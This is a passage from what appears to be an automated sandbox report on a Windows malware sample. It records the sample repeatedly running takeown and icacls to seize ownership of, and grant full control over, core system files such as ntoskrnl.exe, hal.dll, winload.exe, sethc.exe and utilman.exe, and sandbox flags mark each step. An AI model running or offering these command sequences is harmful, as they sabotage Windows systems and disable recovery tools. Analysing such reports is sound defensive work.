  - Suspicious use of AdjustPrivilegeToken
  PID:4516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F
  2⤵
  PID:884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a
  2⤵
  PID:3640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F
  2⤵
  PID:2308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3508
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F
  2⤵
  PID:5796
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5168
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:6052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1124
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\DESIGNER" /a
  2⤵
  PID:4776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\DESIGNER" /grant Administrators:F
  2⤵
  PID:2920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4160
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5212
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F
  2⤵
  PID:5148
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun" /a
  2⤵
  PID:736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun" /grant Administrators:F
  2⤵
  PID:3480
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /a
  2⤵
  PID:2956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /grant Administrators:F
  2⤵
  PID:5996
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F
  2⤵
  PID:5892
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink" /a
  2⤵
  PID:2720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:5336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /grant Administrators:F
  2⤵
  PID:5588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /grant Administrators:F
  2⤵
  PID:3832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F
  2⤵
  PID:4308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /grant Administrators:F
  2⤵
  PID:4424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4644
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5364
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /grant Administrators:F
  2⤵
  PID:1604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4828
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /grant Administrators:F
  2⤵
  PID:4824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:536
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F
  2⤵
  PID:3504
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /grant Administrators:F
  2⤵
  PID:4516
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-US" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-US" /grant Administrators:F
  2⤵
  PID:1608
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F
  2⤵
  PID:2700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /grant Administrators:F
  2⤵
  PID:628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /grant Administrators:F
  2⤵
  PID:6128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /grant Administrators:F
  2⤵
  PID:2820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4988
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:5084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5460
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F
  2⤵
  PID:3804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1680
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /grant Administrators:F
  2⤵
  PID:2504
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /grant Administrators:F
  2⤵
  PID:3524
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2616
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F
  2⤵
  PID:4340
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /grant Administrators:F
  2⤵
  PID:220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5604
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3312
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5328
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /grant Administrators:F
  2⤵
  PID:3836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F
  2⤵
  PID:4400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /grant Administrators:F
  2⤵
  PID:4696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5316
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /grant Administrators:F
  2⤵
  PID:5156
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F
  2⤵
  PID:5760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /grant Administrators:F
  2⤵
  PID:5348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /grant Administrators:F
  2⤵
  PID:5740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /grant Administrators:F
  2⤵
  PID:3504
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5628
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1608
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F
  2⤵
  PID:5868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /grant Administrators:F
  2⤵
  PID:2308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3608
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /grant Administrators:F
  2⤵
  PID:5180
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6128
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /grant Administrators:F
  2⤵
  PID:6120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:6060
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /grant Administrators:F
  2⤵
  PID:2424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /grant Administrators:F
  2⤵
  PID:5856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /grant Administrators:F
  2⤵
  PID:6112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5680
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4008
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5892
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:5420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /grant Administrators:F
  2⤵
  PID:1372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /a
  2⤵
  - Modifies file permissions
  PID:3216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /grant Administrators:F
  2⤵
  PID:5744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /a
  2⤵
  PID:4792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /grant Administrators:F
  2⤵
  PID:4440
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /a
  2⤵
  PID:4456
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /grant Administrators:F
  2⤵
  PID:4144
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /a
  2⤵
  - Modifies file permissions
  PID:3972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a
  2⤵
  PID:4760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /grant Administrators:F
  2⤵
  PID:5004
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F
  2⤵
  PID:4624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /a
  2⤵
  PID:2264
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /grant Administrators:F
  2⤵
  PID:2316
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /a
  2⤵
  PID:1144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /a
  2⤵
  PID:5760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /a
  2⤵
  PID:1772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a
  2⤵
  PID:3052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /grant Administrators:F
  2⤵
  PID:536
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /a
  2⤵
  PID:5476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F
  2⤵
  PID:2376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /grant Administrators:F
  2⤵
  PID:4004
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /grant Administrators:F
  2⤵
  PID:4688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /a
  2⤵
  PID:628
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /grant Administrators:F
  2⤵
  PID:780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /a
  2⤵
  PID:5272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /grant Administrators:F
  2⤵
  PID:4408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a
  2⤵
  PID:3428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo" /a
  2⤵
  PID:1760
- C:\windows\system32\icacls.exe
